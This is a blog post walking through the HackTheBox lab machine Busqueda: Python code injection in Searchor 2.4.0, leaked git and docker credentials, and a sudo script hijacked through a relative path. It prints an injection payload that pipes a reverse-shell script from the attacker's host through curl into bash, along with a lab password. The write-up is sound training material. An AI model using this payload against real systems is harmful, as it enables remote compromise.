<!DOCTYPE html><html lang="en"mode="dark"><!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><!-- i18n for `_javascript/utils/timeago.js` -->
    <meta name="day-prompt" content="days ago">
    <meta name="hour-prompt" content="hours ago">
    <meta name="minute-prompt" content="minutes ago">
    <meta name="justnow-prompt" content="just now"><!-- Begin Jekyll SEO tag v2.7.1 -->
<meta name="generator" content="Jekyll v4.2.1" />
<meta property="og:title" content="Busqueda - HackTheBox" />
<meta property="og:locale" content="en" />
<meta name="description" content="Busqueda is a nice easy linux machine on HackTheBox. It starts with a web application that’s vulnerable to RCE. Once on the box, you will find a GIT repo that has a cred in it’s remote origin config, which will give you access to a Gitea instance. Privesc is by exploiting a custom script with sudo perms." />
<meta property="og:description" content="Busqueda is a nice easy linux machine on HackTheBox. It starts with a web application that’s vulnerable to RCE. Once on the box, you will find a GIT repo that has a cred in it’s remote origin config, which will give you access to a Gitea instance. Privesc is by exploiting a custom script with sudo perms." />
<link rel="canonical" href="https://4g3nt47.github.io/posts/hackthebox/busqueda.html" />
<meta property="og:url" content="https://4g3nt47.github.io/posts/hackthebox/busqueda.html" />
<meta property="og:site_name" content="4g3nt47" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-08-12T00:00:00+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Busqueda - HackTheBox" />
<meta name="twitter:site" content="@UmarAbdoul" />
<meta name="google-site-verification" content="google_meta_tag_verification" />
<script type="application/ld+json">
{"description":"Busqueda is a nice easy linux machine on HackTheBox. It starts with a web application that’s vulnerable to RCE. Once on the box, you will find a GIT repo that has a cred in it’s remote origin config, which will give you access to a Gitea instance. Privesc is by exploiting a custom script with sudo perms.","@type":"BlogPosting","url":"https://4g3nt47.github.io/posts/hackthebox/busqueda.html","headline":"Busqueda - HackTheBox","dateModified":"2023-08-12T00:00:00+01:00","datePublished":"2023-08-12T00:00:00+01:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://4g3nt47.github.io/posts/hackthebox/busqueda.html"},"@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<title>Busqueda - HackTheBox | 4g3nt47
  </title><!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
--><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="4g3nt47">
<meta name="application-name" content="4g3nt47">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">
<!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA --><!-- Bootstrap -->
  <link rel="stylesheet" href="/assets/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="/assets/css/all.min.css"><!--
  CSS selector for site.
-->

<link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet"
    href="/assets/css/bootstrap-toc.min.css"><!-- Manific Popup -->
  <link rel="stylesheet" href="/assets/css/magnific-popup.min.css"><!-- JavaScript -->

  <script src="/assets/js/jquery.min.js"></script>

</head>
<body data-spy="scroll" data-target="#toc"><!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end" lang="en">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" alt="avatar" class="mx-auto"><img src="/assets/img/avatar.png" alt="avatar" onerror="this.style.display='none'"></a>
    </div>

    <div class="site-title mt-3">
      <a href="/">4g3nt47</a>
    </div>
    <div class="site-subtitle font-italic">Welcome to my infosec blog</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs --><li class="nav-item">
      <a href="/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i><span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/tags/" class="nav-link">
        <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i><span>TAGS</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i><span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/about/" class="nav-link">
        <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i><span>ABOUT</span>
      </a>
    </li> <!-- .nav-item --></ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"><a href="https://github.com/4g3nt47" aria-label="github"target="_blank" rel="noopener">
        <i class="fab fa-github"></i>
      </a><a href="https://twitter.com/UmarAbdoul" aria-label="twitter"target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a><a href="javascript:location.href = 'mailto:' + ['aufaruq02','gmail.com'].join('@')" aria-label="email">
        <i class="fas fa-envelope"></i>
      </a><a href="/rss/feed.xml" aria-label="rss">
        <i class="fas fa-rss"></i>
      </a></div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->
<!--
  The Top Bar
-->

<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb"><span>
            <a href="/">
              Home
            </a>
          </span><span>Busqueda - HackTheBox</span></span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">Post</div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>
<div id="main-wrapper">
      <div id="main">

        <div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-8">
    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><!--
  Refactor the HTML structure.
--><!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
--><!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
--><!-- Add attribute 'hide-bullet' to the checkbox list --><!-- images --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add header for code snippets --><!-- Create heading anchors --><!-- return -->

<h1 data-toc-skip>Busqueda - HackTheBox</h1>

<div class="post-meta text-muted">

  <!-- author -->
  <div>By
    <em><a href="https://twitter.com/UmarAbdoul">Umar Abdul</a></em>
  </div>

  <div class="d-flex">
    <div>
      <!-- published date -->
      <span>
        Posted<!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeago"
    date="2023-08-12 00:00:00 +0100"data-toggle="tooltip"
      data-placement="bottom"
      title="Sat, Aug 12, 2023, 12:00 AM +0100">Aug 12</em>
</span>

      <!-- lastmod date --><!-- read time --><!--
  Calculate the post's reading time, and display the word count in tooltip
 --><!-- words per minute  --><!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="972 words">
  <em>5 min</em> read</span>
<!-- page views --></div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <p><strong>Busqueda</strong> is a nice easy linux machine on <em>HackTheBox</em>. It starts with a web application that’s vulnerable to <em>RCE</em>. Once on the box, you will find a GIT repo that has a cred in it’s remote origin config, which will give you access to a <em>Gitea</em> instance. Privesc is by exploiting a custom script with sudo perms.</p>

<p><br /></p>

<h3 id="about">About<a href="#about" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p><img data-src="/assets/img/Pasted image 20230812065633.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230812065716.png" alt="" data-proofer-ignore></p>

<p><br /></p>

<h3 id="recon">Recon<a href="#recon" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<h4 id="nmap">NMAP<a href="#nmap" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4>
<p><br /></p>

<div class="language-plaintext highlighter-rouge"><div class="code-header"><span label-text="Plaintext"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td><td class="rouge-code"><pre># Nmap 7.70 scan initiated Mon Jul 31 06:51:57 2023 as: nmap -sC -sV -oN nmap.txt -v 10.10.11.208
Increasing send delay for 10.10.11.208 from 5 to 10 due to 11 out of 26 dropped probes since last increase.
Increasing send delay for 10.10.11.208 from 10 to 20 due to 11 out of 18 dropped probes since last increase.
Increasing send delay for 10.10.11.208 from 20 to 40 due to 11 out of 15 dropped probes since last increase.
Nmap scan report for 10.10.11.208
Host is up (0.50s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 31 06:53:07 2023 -- 1 IP address (1 host up) scanned in 70.24 seconds
</pre></td></tr></tbody></table></code></div></div>

<p><br /></p>

<h4 id="web">Web<a href="#web" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4>
<p><br /></p>

<p>Server redirects to <code class="language-plaintext highlighter-rouge">searcher.htb</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230812071854.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230812072012.png" alt="" data-proofer-ignore></p>

<p>Site is running <em>Searchor v2.4.0</em>, which is available on <a href="https://github.com/ArjunSharda/Searchor">GitHub</a></p>

<p><img data-src="/assets/img/Pasted image 20230812072417.png" alt="" data-proofer-ignore></p>

<p>Entering a simple search term returns a link;</p>

<p><img data-src="/assets/img/Pasted image 20230812072919.png" alt="" data-proofer-ignore></p>

<p>The request made;</p>

<p><img data-src="/assets/img/Pasted image 20230812073004.png" alt="" data-proofer-ignore></p>

<p>When testing the <code class="language-plaintext highlighter-rouge">query</code> parameter, the endpoint is behaving differently whenever a single quote <code class="language-plaintext highlighter-rouge">'</code> is entered;</p>

<p><img data-src="/assets/img/Pasted image 20230812073232.png" alt="" data-proofer-ignore></p>

<p>Suspected SQL injection, but none of the usual payloads seems to work. I installed <em>Seachor</em> locally for testing;</p>

<div class="language-bash highlighter-rouge"><div class="code-header"><span label-text="Shell"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>https://github.com/ArjunSharda/Searchor/archive/refs/tags/v2.4.0.tar.gz
<span class="nv">$ </span><span class="nb">tar</span> <span class="nt">-xvf</span> v2.4.0.tar.gz
<span class="nv">$ </span><span class="nb">cd </span>Searchor-2.4.0
<span class="nv">$ </span><span class="nb">sudo </span>python3 setup.py <span class="nb">install</span>
</pre></td></tr></tbody></table></code></div></div>

<p>The README shows how the program is used. It has a module you can import and use in python, and also a CLI version. The module seems to handle single quotes well when called from a python REPL;</p>

<p><img data-src="/assets/img/Pasted image 20230812074023.png" alt="" data-proofer-ignore></p>

<p>However, the CLI tool provided gave an error;</p>

<p><img data-src="/assets/img/Pasted image 20230812074204.png" alt="" data-proofer-ignore></p>

<p>Notice how the <code class="language-plaintext highlighter-rouge">'</code> in the call to <code class="language-plaintext highlighter-rouge">Engine.Accuweather.Search</code> is not balanced, and we were able to escape the quotation. This indicates our query is injected directly into a python code used to call the library. Testing this, we got code execution;</p>

<p><img data-src="/assets/img/Pasted image 20230812074648.png" alt="" data-proofer-ignore></p>

<p>Testing on the box, I was unable to execute a bash rev shell directly. Had to curl it from my box, but it worked, and I got in as the user <code class="language-plaintext highlighter-rouge">svc</code>;</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header"><span label-text="Plaintext"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>engine=Accuweather&amp;query=',exec("import os; os.system('curl 10.10.16.10/rev.sh | /bin/bash')"),'
</pre></td></tr></tbody></table></code></div></div>

<p><img data-src="/assets/img/Pasted image 20230812075857.png" alt="" data-proofer-ignore></p>

<p>User flag was found in <code class="language-plaintext highlighter-rouge">~/user.txt</code></p>

<hr />
<p><br /></p>

<h3 id="privesc">PrivEsc<a href="#privesc" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p>Can’t check sudo perms for <code class="language-plaintext highlighter-rouge">svc</code> as we still don’t have his password. <code class="language-plaintext highlighter-rouge">.gitconfig</code> file was found in the home directory, which is what is used to configure <code class="language-plaintext highlighter-rouge">git</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230812080610.png" alt="" data-proofer-ignore></p>

<p>Checking the web app root dir at <code class="language-plaintext highlighter-rouge">/var/www/app</code> showed a <code class="language-plaintext highlighter-rouge">.git</code> folder, indicating it’s a GIT repo. Running <code class="language-plaintext highlighter-rouge">git status</code> prompted us to add the directory as <em>safe</em> for git;</p>

<p><img data-src="/assets/img/Pasted image 20230812081017.png" alt="" data-proofer-ignore></p>

<p>Notice from the output above the repo is in sync with <code class="language-plaintext highlighter-rouge">origin/main</code>, which indicates an upstream has been configured. Listing the remote origins, a cred was revealed;</p>

<p><img data-src="/assets/img/Pasted image 20230812081319.png" alt="" data-proofer-ignore></p>

<p>This is the same username that was found in <code class="language-plaintext highlighter-rouge">/home/svc/.gitconfig</code>. Testing the password on the account, I was able to login over SSH. <code class="language-plaintext highlighter-rouge">sudo -l</code> reveals a sudo perm on a custom script;</p>

<p><img data-src="/assets/img/Pasted image 20230812081749.png" alt="" data-proofer-ignore></p>

<p>However I do not have read perms on the file;</p>

<p><img data-src="/assets/img/Pasted image 20230812081836.png" alt="" data-proofer-ignore></p>

<p>Further enum showed a local <em>apache2</em> VHOST in <code class="language-plaintext highlighter-rouge">/etc/apache2/sites-enabled/000-default.conf</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230812082355.png" alt="" data-proofer-ignore></p>

<p>I setup an SSH tunnel to <code class="language-plaintext highlighter-rouge">127.0.0.1:3000</code>, and was able to access it through my browser;</p>

<p><img data-src="/assets/img/Pasted image 20230812082507.png" alt="" data-proofer-ignore></p>

<p>We already have the password of the <code class="language-plaintext highlighter-rouge">svc</code> user. Trying it on the Gitea instance didn’t work. But earlier we saw <code class="language-plaintext highlighter-rouge">svc</code> using the name <code class="language-plaintext highlighter-rouge">cody</code> in <code class="language-plaintext highlighter-rouge">.gitconfig</code>. Trying <code class="language-plaintext highlighter-rouge">cody:jh1usoih2bkjaspwe92</code> allowed me to login;</p>

<p><img data-src="/assets/img/Pasted image 20230812082917.png" alt="" data-proofer-ignore></p>

<p>Nothing of interest was found, except for the admin user;</p>

<p><img data-src="/assets/img/Pasted image 20230812082820.png" alt="" data-proofer-ignore></p>

<p>Going back to the sudo script, it accepts 3 arguments;</p>

<p><img data-src="/assets/img/Pasted image 20230812083106.png" alt="" data-proofer-ignore></p>

<p><code class="language-plaintext highlighter-rouge">docker-ps</code> showed 2 docker containers running;</p>

<div class="language-text highlighter-rouge"><div class="code-header"><span label-text="Text"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>CONTAINER ID   IMAGE                COMMAND                  CREATED        STATUS          PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   7 months ago   Up 29 minutes   127.0.0.1:3000-&gt;3000/tcp, 127.0.0.1:222-&gt;22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   7 months ago   Up 29 minutes   127.0.0.1:3306-&gt;3306/tcp, 33060/tcp               mysql_db
</pre></td></tr></tbody></table></code></div></div>

<p>The <code class="language-plaintext highlighter-rouge">docker-inspect</code> allows us to supply a <em>format</em> and <em>container</em> name. This is interesting because docker has an <code class="language-plaintext highlighter-rouge">inspect</code> command used to pull info from containers if we can supply a custom Go template;</p>

<p><img data-src="/assets/img/Pasted image 20230812083759.png" alt="" data-proofer-ignore></p>

<p>Trying a template that will print the docker configuration of a container worked, and we got a new MySQL cred;</p>

<p><img data-src="/assets/img/Pasted image 20230812083954.png" alt="" data-proofer-ignore></p>

<p>Remember <code class="language-plaintext highlighter-rouge">docker-ps</code> showed port <code class="language-plaintext highlighter-rouge">3306</code> (MySQL) is forwarded to the <code class="language-plaintext highlighter-rouge">mysql_db</code> container on the box. Was able to login successfully and get the hash of <code class="language-plaintext highlighter-rouge">administrator</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230812084621.png" alt="" data-proofer-ignore></p>

<p>No need to crack this though as the password used for the Gitea MySQL database is also the password of the user <code class="language-plaintext highlighter-rouge">administrator</code>, and we now have access to a repo containing the source code of the sudo scripts;</p>

<p><img data-src="/assets/img/Pasted image 20230812085220.png" alt="" data-proofer-ignore></p>

<p>Going through the source code of <code class="language-plaintext highlighter-rouge">system-checkup.py</code>, the script is calling <code class="language-plaintext highlighter-rouge">run_command()</code> with a relative path;</p>

<p><img data-src="/assets/img/Pasted image 20230812085520.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230812085542.png" alt="" data-proofer-ignore></p>

<p>This makes the script vulnerable to arbitrary code execution as we could simply create a file in our current directory named <code class="language-plaintext highlighter-rouge">full-checkup.sh</code> and it wil be executed;</p>

<p><img data-src="/assets/img/Pasted image 20230812090108.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230812090253.png" alt="" data-proofer-ignore></p>

<hr />
<p><br /></p>

<h3 id="summary">Summary<a href="#summary" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">nmap</code> found port 22 (OpenSSH) and 80 (Apache2)</li>
  <li>Werkzeug web app that uses <code class="language-plaintext highlighter-rouge">Searchor v2.4.0</code> to run searches
    <ul>
      <li>Exploited an RCE bug to gain a shell as <code class="language-plaintext highlighter-rouge">svc</code></li>
    </ul>
  </li>
  <li>Inside as <code class="language-plaintext highlighter-rouge">svc</code>;
    <ul>
      <li>Got <code class="language-plaintext highlighter-rouge">user.txt</code></li>
      <li><code class="language-plaintext highlighter-rouge">sudo</code> perms configured, but no read access to the script.</li>
      <li>Found a cred for a git remote origin.</li>
      <li>Password was reused by user <code class="language-plaintext highlighter-rouge">cody</code> on local Gitea instance.</li>
      <li>Pulled Gitea <code class="language-plaintext highlighter-rouge">adminstrator</code> creds from docker config;
        <ul>
          <li>Found source code of the <code class="language-plaintext highlighter-rouge">sudo</code> script.</li>
          <li>Identified a relative call to a local script.</li>
          <li>Hijacked it to gain code execution as <code class="language-plaintext highlighter-rouge">root</code>.</li>
        </ul>
      </li>
    </ul>
  </li>
</ul>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories --><div class="post-meta mb-3">
    <i class="far fa-folder-open fa-fw mr-1"></i><a href='/categories/hackthebox/'>hackthebox</a></div><!-- tags --><div class="post-tags">
    <i class="fa fa-tags fa-fw mr-1"></i><a href="/tags/hackthebox/"
          class="post-tag no-text-decoration" >hackthebox</a><a href="/tags/linux/"
          class="post-tag no-text-decoration" >linux</a><a href="/tags/web/"
          class="post-tag no-text-decoration" >web</a><a href="/tags/python/"
          class="post-tag no-text-decoration" >python</a><a href="/tags/werkzeug/"
          class="post-tag no-text-decoration" >werkzeug</a><a href="/tags/apache/"
          class="post-tag no-text-decoration" >apache</a><a href="/tags/tunnel/"
          class="post-tag no-text-decoration" >tunnel</a><a href="/tags/searchor/"
          class="post-tag no-text-decoration" >searchor</a><a href="/tags/gitea/"
          class="post-tag no-text-decoration" >gitea</a><a href="/tags/docker/"
          class="post-tag no-text-decoration" >docker</a><a href="/tags/docker-inspect/"
          class="post-tag no-text-decoration" >docker-inspect</a></div><div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a> by the author.</div><!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons"><a href="https://twitter.com/intent/tweet?text=Busqueda - HackTheBox - 4g3nt47&url=https://4g3nt47.github.io/posts/hackthebox/busqueda.html" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a><a href="https://www.facebook.com/sharer/sharer.php?title=Busqueda - HackTheBox - 4g3nt47&u=https://4g3nt47.github.io/posts/hackthebox/busqueda.html" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a><a href="https://telegram.me/share?text=Busqueda - HackTheBox - 4g3nt47&url=https://4g3nt47.github.io/posts/hackthebox/busqueda.html" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a><i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        title-succeed="Link copied successfully!">
    </i>

  </span>
</div>
</div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->

</div>
  </div> <!-- #core-wrapper -->

  <!-- pannel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

    <div class="access"><!--<div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
